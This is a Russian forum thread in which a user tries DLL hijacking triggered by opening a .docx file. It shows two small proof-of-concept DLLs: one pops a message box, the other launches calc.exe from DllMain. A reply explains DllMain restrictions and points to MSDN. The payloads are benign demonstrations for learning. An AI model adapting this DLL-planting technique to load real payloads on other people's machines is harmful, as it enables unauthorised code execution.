DLL hijacking или подмена DLL при открытии .docx

@Alex_The_King · Регистрация: 31.07.2014

Студворк — интернет-сервис помощи студентам

Набрел как-то на статью на хабре. Решил проверить на своем компе. Создал DLL следующего содержания:

C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#include <windows.h>
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
            MessageBoxA(NULL, "Hi from DLL", "Info", MB_OK);
            break;
 
        case DLL_PROCESS_DETACH:
            // detach from process
            break;
 
        case DLL_THREAD_ATTACH:
            // attach to thread
            break;
 
        case DLL_THREAD_DETACH:
            // detach from thread
            break;
    }
    return TRUE; // succesful
}

Все просто. Попробовал проэксплуатировать - ничего. Скачал библиотеки Parvez'a Anwar'a с ссылки с поста, переименовал его dll - все заработало. Собственно код его dll:

C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <stdio.h>
#include <windows.h>
 
#pragma comment(lib,"shell32.lib")
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
   if (fdwReason==DLL_PROCESS_ATTACH)
   {
      ShellExecute(NULL, "open", "c:\\windows\\system32\\calc.exe",  NULL, NULL, SW_SHOWNORMAL);
   }
   else 
    return TRUE;
 
   return FALSE;
}

Прошу прокомментировать, может где ошибка у меня?
Еще очень странно, что его dll занимает 52 Кб в отличии от моей Debug версии в 25 Кб. Также пробовал с двумя версиями: и Debug, и Release
Прошу помочь) Уж очень интересно как это все работает
Заранее спасибо

Убежденный · 08.12.2015, 09:50

Из DllMain можно вызывать только функции ntdll и некоторое подмножество kernel32/kernelbase.
Так что оба примера - г-нкод и работают лишь чудом.

@Alex_The_King · 08.12.2015, 12:15 **[ТС]**

А где можно побольше найти информации и по этому вопросу? В плане о dll в целом и ntdll?

Убежденный · 08.12.2015, 12:42

На MSDN есть достаточно полезных материалов по теме.
Ключевые слова - "creating dll", "dll best practices", "dllmain" и т.п.

А ntdll - это недокументированно, официальной информации очень мало.

@Alex_The_King · 08.12.2015, 12:59 **[ТС]**

Спасибо большое, будем разбираться

Новые блоги и статьи Все статьи Все блоги /
PhpStorm 2025.3: WSL Terminal всегда стартует в ~ and_y87 14.12.2025 PhpStorm 2025. 3: WSL Terminal всегда стартует в ~ (home), игнорируя директорию проекта Симптом: После обновления до PhpStorm 2025. 3 встроенный терминал WSL открывается в домашней директории. . .	Access VikBal 11.12.2025 Помогите пожалуйста !! Как объединить 2 одинаковые БД Access с разными данными.	Новый ноутбук volvo 07.12.2025 Всем привет. По скидке в "черную пятницу" взял себе новый ноутбук Lenovo ThinkBook 16 G7 на Амазоне: Ryzen 5 7533HS 64 Gb DDR5 1Tb NVMe 16" Full HD Display Win11 Pro	Музыка, написанная Искусственным Интеллектом volvo 04.12.2025 Всем привет. Некоторое время назад меня заинтересовало, что уже умеет ИИ в плане написания музыки для песен, и, собственно, исполнения этих самых песен. Стихов у нас много, уже вышли 4 книги, еще 3. . .	От async/await к виртуальным потокам в Python IndentationError 23.11.2025 Армин Ронахер поставил под сомнение async/ await. Создатель Flask заявляет: цветные функции - провал, виртуальные потоки - решение. Не threading-динозавры, а новое поколение лёгких потоков. Откат?. . .
Поиск "дружественных имён" СОМ портов Argus19 22.11.2025 Поиск "дружественных имён" СОМ портов На странице: https:/ / norseev. ru/ 2018/ 01/ 04/ comportlist_windows/ нашёл схожую тему. Там приведён код на С++, который показывает только имена СОМ портов, типа,. . .	Сколько Государство потратило денег на меня, обеспечивая инсулином. Programma_Boinc 20.11.2025 Сколько Государство потратило денег на меня, обеспечивая инсулином. Вот решила сделать интересный приблизительный подсчет, сколько государство потратило на меня денег на покупку инсулинов. . . .	Ломающие изменения в C#.NStar Alpha Etyuhibosecyu 20.11.2025 Уже можно не только тестировать, но и пользоваться C#. NStar - писать оконные приложения, содержащие надписи, кнопки, текстовые поля и даже изображения, например, моя игра "Три в ряд" написана на этом. . .	Мысли в слух kumehtar 18.11.2025 Кстати, совсем недавно имел разговор на тему медитаций с людьми. И обнаружил, что они вообще не понимают что такое медитация и зачем она нужна. Самые базовые вещи. Для них это - когда просто люди. . .	Создание Single Page Application на фреймах krapotkin 16.11.2025 Статья исключительно для начинающих. Подходы оригинальностью не блещут. В век Веб все очень привыкли к дизайну Single-Page-Application . Быстренько разберем подход "на фреймах". Мы делаем одну. . .

Убежденный Ушел с форума 16481 / 7444 / 1187 Регистрация: 02.05.2013 Сообщений: 11,616 Записей в блоге: 1
	08.12.2015, 09:50
	Из DllMain можно вызывать только функции ntdll и некоторое подмножество kernel32/kernelbase. Так что оба примера - г-нкод и работают лишь чудом. 0

@Alex_The_King 1 / 1 / 0 Регистрация: 31.07.2014 Сообщений: 55
	08.12.2015, 12:15 [ТС]
	А где можно побольше найти информации и по этому вопросу? В плане о dll в целом и ntdll? 0

Убежденный Ушел с форума 16481 / 7444 / 1187 Регистрация: 02.05.2013 Сообщений: 11,616 Записей в блоге: 1
	08.12.2015, 12:42
	Сообщение было отмечено Alex_The_King как решение Решение На MSDN есть достаточно полезных материалов по теме. Ключевые слова - "creating dll", "dll best practices", "dllmain" и т.п. А ntdll - это недокументированно, официальной информации очень мало. 1

@Alex_The_King 1 / 1 / 0 Регистрация: 31.07.2014 Сообщений: 55
	08.12.2015, 12:59 [ТС]
	Спасибо большое, будем разбираться 0

DLL hijacking или подмена DLL при открытии .docx

Решение